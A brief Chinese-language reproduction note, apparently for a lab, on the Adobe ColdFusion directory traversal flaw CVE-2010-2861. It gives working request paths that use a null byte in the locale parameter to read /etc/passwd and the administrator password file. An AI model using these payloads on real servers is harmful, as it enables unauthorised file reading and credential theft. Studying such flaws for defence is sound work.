Adobe ColdFusion文件读取漏洞(CVE-2010-2861)
漏洞复现:
Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
访问该目录
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en #后台管理员密码